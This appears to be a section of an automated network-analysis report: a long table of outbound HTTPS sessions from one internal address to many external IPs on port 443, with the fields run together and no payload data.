                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15036192.168.2.2347344171.103.105.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15037192.168.2.234005019.193.146.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15038192.168.2.235699284.177.10.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15039192.168.2.235676274.238.126.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15040192.168.2.2338264159.249.163.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15041192.168.2.234248262.73.93.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15042192.168.2.23584442.207.150.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15043192.168.2.2343466187.12.201.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15044192.168.2.2347638188.9.201.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15045192.168.2.2352236145.173.231.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15046192.168.2.2339184194.30.174.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15047192.168.2.2332988194.32.211.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15048192.168.2.234372080.124.17.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15049192.168.2.234277277.185.64.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15050192.168.2.235440086.97.125.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15051192.168.2.236073643.213.128.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15052192.168.2.2336018157.103.50.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15053192.168.2.2347966181.173.43.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15054192.168.2.2335458129.83.192.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15055192.168.2.2360128154.73.72.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15056192.168.2.2351022204.16.125.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15057192.168.2.2343360180.9.161.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15058192.168.2.234368091.168.166.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15059192.168.2.2356744118.143.175.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15060192.168.2.2355888180.227.163.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15061192.168.2.234350831.81.196.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15062192.168.2.2356980194.55.212.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15063192.168.2.2356210118.88.132.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15064192.168.2.235396060.51.130.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15065192.168.2.2357940111.246.202.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15066192.168.2.233781442.20.187.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15067192.168.2.2336042188.103.231.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15068192.168.2.235750692.172.239.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15069192.168.2.234494252.59.141.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15070192.168.2.2357788198.196.63.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15071192.168.2.2358454203.49.229.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15072192.168.2.2352254211.59.198.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15073192.168.2.2344370156.55.102.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15074192.168.2.2351436107.228.113.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15075192.168.2.2333694135.40.1.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15076192.168.2.235390483.62.201.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15077192.168.2.2353072138.190.46.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15078192.168.2.233282885.55.97.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15079192.168.2.235680659.32.84.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15080192.168.2.2341804188.132.214.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15081192.168.2.2335264155.112.126.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15082192.168.2.2341820110.180.91.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15083192.168.2.2355622129.251.255.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15084192.168.2.2336980161.16.143.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15085192.168.2.2337940173.122.120.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15086192.168.2.234539832.29.0.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15087192.168.2.2333474140.8.128.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15088192.168.2.2346344119.138.111.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15089192.168.2.2353608140.62.244.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15090192.168.2.2343404154.82.42.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15091192.168.2.2342450109.205.227.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15092192.168.2.235942044.116.74.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15093192.168.2.234685653.49.80.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15094192.168.2.2357176144.59.147.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15095192.168.2.233966675.12.176.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15096192.168.2.23549705.42.86.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15097192.168.2.2337864132.3.54.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15098192.168.2.233653691.116.161.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15099192.168.2.235213478.255.17.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15100192.168.2.2339070125.8.173.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15101192.168.2.234690087.249.216.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15102192.168.2.234330839.80.244.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15103192.168.2.235348860.112.45.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15104192.168.2.233968862.121.35.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15105192.168.2.234684250.248.46.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15106192.168.2.234983036.195.107.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15107192.168.2.2341150123.86.169.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15108192.168.2.2337118166.210.61.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15109192.168.2.2336376181.153.136.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15110192.168.2.2354674124.62.115.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15111192.168.2.2353446139.204.101.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15112192.168.2.2337864101.25.1.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15113192.168.2.233285442.155.218.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15114192.168.2.2339914217.181.182.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15115192.168.2.2338882200.122.16.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15116192.168.2.234407873.157.81.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15117192.168.2.234561618.56.48.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15118192.168.2.2337830147.228.79.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15119192.168.2.2333738222.242.241.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15120192.168.2.2338432173.94.153.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15121192.168.2.2343766185.255.218.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15122192.168.2.234336448.207.12.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15123192.168.2.2348322159.243.139.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15124192.168.2.234226212.114.78.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15125192.168.2.2340970151.225.107.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15126192.168.2.235653261.177.156.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15127192.168.2.2351694192.110.97.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15128192.168.2.235679041.126.164.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15129192.168.2.2342556166.37.30.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15130192.168.2.2360448181.154.181.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15131192.168.2.234261284.171.49.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15132192.168.2.234984289.43.81.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15133192.168.2.2355410155.186.13.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15134192.168.2.2353046183.241.247.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15135192.168.2.2336304218.253.72.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15136192.168.2.2353842190.139.123.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15137192.168.2.2350702103.212.40.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15138192.168.2.2350600213.176.38.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15139192.168.2.234446427.117.94.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15140192.168.2.2359412114.186.27.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15141192.168.2.234006034.175.49.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15142192.168.2.233757217.40.237.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15143192.168.2.235708646.179.245.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15144192.168.2.233771414.213.195.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15145192.168.2.2334738174.168.43.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15146192.168.2.235798474.233.113.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15147192.168.2.2333602116.209.100.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15148192.168.2.2346936101.46.169.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15149192.168.2.2341466209.205.139.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15150192.168.2.235431889.34.233.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15151192.168.2.2338808190.186.38.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15152192.168.2.234020284.6.136.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15153192.168.2.2336270143.35.106.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15154192.168.2.2359980151.61.227.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15155192.168.2.234461672.79.24.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15156192.168.2.234497491.183.44.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15157192.168.2.2355848141.21.61.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15158192.168.2.235916852.51.13.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15159192.168.2.234258040.177.98.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15160192.168.2.233991873.168.172.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15161192.168.2.2340376115.147.33.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15162192.168.2.2359086188.249.172.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15163192.168.2.2351908112.163.46.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15164192.168.2.235062895.146.171.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15165192.168.2.235053644.48.233.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15166192.168.2.233913476.242.234.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15167192.168.2.2338780153.127.21.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15168192.168.2.235422460.180.116.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15169192.168.2.235979487.202.182.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15170192.168.2.2348086204.229.112.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15171192.168.2.235020038.79.233.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15172192.168.2.2337140136.122.83.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15173192.168.2.2353034164.17.252.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15174192.168.2.233907482.151.156.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15175192.168.2.2338120118.8.249.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15176192.168.2.235034024.193.52.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15177192.168.2.2337850153.241.221.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15178192.168.2.2334084142.70.242.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15179192.168.2.234842474.185.148.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15180192.168.2.2344588222.148.153.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15181192.168.2.234417446.191.54.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15182192.168.2.2348276159.71.190.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15183192.168.2.235883243.159.8.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15184192.168.2.2358642181.165.51.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15185192.168.2.2334452169.163.219.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15186192.168.2.2357650191.208.117.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15187192.168.2.2334330110.3.27.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15188192.168.2.2341924136.80.192.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15189192.168.2.235568684.58.122.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15190192.168.2.2340792106.17.189.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15191192.168.2.2352532191.161.212.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192192.168.2.23567881.144.63.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15193192.168.2.2346228144.239.215.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15194192.168.2.2335532135.193.196.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15195192.168.2.2339892156.179.244.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15196192.168.2.2348116131.159.32.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15197192.168.2.2346792191.135.99.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15198192.168.2.2353290100.135.201.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15199192.168.2.2348272165.157.57.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15200192.168.2.2349240204.12.4.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15201192.168.2.2344266118.223.211.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15202192.168.2.2351420176.28.42.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15203192.168.2.2333284131.61.157.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15204192.168.2.23520982.202.71.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15205192.168.2.234602068.230.98.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15206192.168.2.234834489.247.74.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15207192.168.2.2335906117.164.74.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15208192.168.2.2341040113.168.120.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15209192.168.2.235287468.30.232.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15210192.168.2.233633886.118.43.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15211192.168.2.234884212.109.133.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15212192.168.2.2349782149.175.203.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15213192.168.2.233752685.125.151.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15214192.168.2.2339880124.188.138.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15215192.168.2.234101039.187.224.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15216192.168.2.2343020143.160.172.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15217192.168.2.2345398197.101.179.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15218192.168.2.2360978194.150.212.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15219192.168.2.2340134187.82.170.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15220192.168.2.2338276155.81.230.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15221192.168.2.233473863.117.137.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15222192.168.2.2358734198.37.42.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15223192.168.2.233867023.76.10.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15224192.168.2.233991682.109.54.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15225192.168.2.235169044.227.17.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15226192.168.2.233897883.163.51.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15227192.168.2.2353420190.72.9.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15228192.168.2.235317241.65.64.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15229192.168.2.233404481.1.251.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15230192.168.2.2351476164.203.2.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15231192.168.2.234389881.102.79.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15232192.168.2.2345716186.101.173.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15233192.168.2.2337566179.218.35.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15234192.168.2.233467224.203.114.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15235192.168.2.236074496.171.46.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15236192.168.2.234930018.124.32.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15237192.168.2.234082072.69.45.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15238192.168.2.234806853.204.251.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15239192.168.2.2346802107.209.145.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15240192.168.2.234010244.193.127.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15241192.168.2.235535096.216.59.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15242192.168.2.2359666120.43.254.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15243192.168.2.2336246202.99.0.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15244192.168.2.233521448.146.207.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15245192.168.2.23369504.230.100.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15246192.168.2.2334912153.171.239.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15247192.168.2.23560745.59.33.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15248192.168.2.234434823.140.57.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15249192.168.2.235257267.89.213.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15250192.168.2.2333416206.2.80.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15251192.168.2.23502404.121.255.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15252192.168.2.2351800118.199.52.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15253192.168.2.23359609.137.221.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15254192.168.2.2339714198.127.188.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15255192.168.2.2338654116.83.143.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15256192.168.2.235563835.133.79.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15257192.168.2.2343378166.13.80.44443
                                                TimestampBytes transferredDirectionData


